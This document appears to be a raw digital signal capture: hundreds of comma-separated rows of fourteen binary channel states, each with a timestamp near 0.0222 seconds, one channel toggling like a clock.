0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2164956e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2164980e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2165004e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2165028e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2165056e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2165080e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2165108e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2165132e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2165156e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2165180e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2165204e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2165228e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2165256e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2165280e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2165308e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2165332e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2165356e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2165380e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2165404e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2165428e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2165456e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2165480e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2165508e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2165532e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2165556e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2165580e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2165604e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2165628e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2165656e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2165680e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2165708e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2165732e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2165756e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2165780e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2165804e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2165828e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2165856e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2165880e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2165908e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2165932e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2165956e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2165980e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2166004e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2166028e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2166056e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2166080e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2166108e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2166132e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2166156e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2166180e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2166204e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2166228e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2166256e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2166280e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2166308e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2166332e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2166356e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2166380e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2166404e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2166428e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2166456e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2166480e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2166508e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2166532e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2166556e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2166580e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2166604e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2166628e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2166656e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2166680e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2166708e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2166732e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2166756e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2166780e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2166804e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2166828e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2166852e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2166876e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2166900e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2166928e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2166952e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2166980e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2167004e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2167028e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2167052e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2167076e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2167100e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2167128e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2167152e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2167180e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2167204e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2167228e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2167252e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2167276e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2167300e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2167328e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2167352e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2167380e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2167404e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2167428e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2167452e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2167476e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2167500e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2167528e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2167556e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2167580e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2167608e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2167632e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2167660e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2167684e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,2.2292528e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,2.2292764e-02 1,0,0,1,1,0,0,0,0,0,0,1,0,1,2.2292780e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,2.2292812e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,2.2293100e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,2.2293124e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,2.2293148e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,2.2293172e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,2.2293196e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,2.2293224e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,2.2293248e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,2.2293276e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,2.2293300e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,2.2293324e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,2.2293348e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2293360e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2293372e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2293396e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2293420e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2293448e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2293472e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2293500e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2293524e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2293548e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2293572e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2293596e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2293620e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2293648e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2293672e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2293700e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2293724e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2293748e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2293772e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2293796e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2293820e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2293844e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2293868e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2293896e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2293920e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2293948e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2293972e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2293996e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2294020e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2294044e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2294068e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2294096e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2294120e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2294148e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2294172e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2294196e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2294220e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2294244e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2294268e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2294296e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2294320e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2294348e-02 1,0,0,1,1,0,0,0,0,1,0,0,0,0,2.2294372e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,2.2294376e-02 1,0,0,1,1,1,0,0,0,1,0,0,1,0,2.2294420e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,2.2294444e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2294452e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2294468e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2294496e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2294520e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2294548e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2294572e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2294596e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2294620e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2294644e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2294668e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2294696e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2294748e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2294772e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,2.2294776e-02 1,0,0,1,1,1,0,0,0,1,0,0,1,0,2.2294796e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,2.2294820e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2294828e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2294844e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2294868e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2294896e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2294920e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2294948e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2294972e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2294996e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2295020e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2295044e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2295068e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2295096e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2295120e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2295148e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2295172e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2295196e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2295220e-02 1,0,0,1,1,0,0,0,0,1,0,0,0,0,2.2295224e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,2.2295228e-02 1,0,0,1,1,1,0,0,0,1,0,0,1,0,2.2295272e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,2.2295296e-02 1,0,0,1,1,1,0,0,0,0,0,0,0,0,2.2295300e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2295304e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2295320e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2295348e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2295372e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2295396e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2295420e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2295444e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2295472e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2295500e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2295524e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2295548e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2295576e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2295600e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2295628e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2295652e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2295676e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2295700e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2295752e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2295776e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,2.2295780e-02 1,0,0,1,1,1,0,0,0,1,0,0,1,0,2.2295800e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,2.2295828e-02 1,0,0,1,1,1,0,0,0,1,0,0,1,0,2.2295876e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,2.2295900e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2295908e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2295924e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2295948e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2295976e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2296000e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2296028e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2296052e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2296076e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2296100e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2296124e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2296148e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2296176e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2296200e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2296228e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2296252e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2296276e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2296300e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2296328e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2296352e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2296380e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2296404e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2296428e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2296452e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2296476e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2296500e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2296528e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2296552e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2296580e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2296604e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2296628e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2296652e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2296676e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2296700e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2296728e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2296752e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2296780e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2296804e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2296828e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2296852e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2296876e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2296900e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2296928e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2296952e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2296980e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2297004e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2297028e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2297052e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2297076e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2297100e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2297128e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2297152e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2297180e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2297204e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2297228e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2297252e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2297276e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2297300e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2297328e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2297352e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2297380e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2297404e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2297428e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2297452e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2297476e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2297500e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2297528e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2297552e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2297580e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2297604e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2297628e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2297652e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2297676e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2297700e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2297728e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2297752e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2297780e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2297804e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2297828e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2297852e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2297876e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2297900e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2297928e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2297952e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2297980e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2298004e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2298028e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2298052e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2298076e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2298100e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2298128e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2298152e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2298180e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2298204e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2298228e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2298252e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2298276e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2298300e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2298328e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2298352e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2298380e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2298404e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2298428e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2298452e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2298476e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2298500e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2298528e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2298556e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2298580e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2298604e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2298628e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2298652e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2298676e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2298700e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2298728e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2298752e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2298780e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2298804e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2298828e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2298852e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2298876e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2298900e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2298928e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2298952e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2298980e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2299004e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2299028e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2299052e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2299076e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2299100e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2299128e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2299152e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2299180e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2299204e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2299228e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2299252e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2299276e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2299300e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2299328e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2299352e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2299380e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2299404e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2299428e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2299452e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2299476e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2299500e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2299528e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2299552e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2299580e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2299604e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,2.2424432e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,2.2424644e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,2.2424664e-02 0,1,0,1,1,0,0,0,0,0,0,1,0,1,2.2424692e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,2.2424716e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,2.2425000e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,2.2425028e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,2.2425076e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,2.2425100e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,2.2425124e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,2.2425148e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,2.2425176e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,2.2425200e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,2.2425228e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,2.2425252e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2425264e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2425300e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2425324e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2425348e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2425376e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2425428e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2425452e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2425476e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2425500e-02 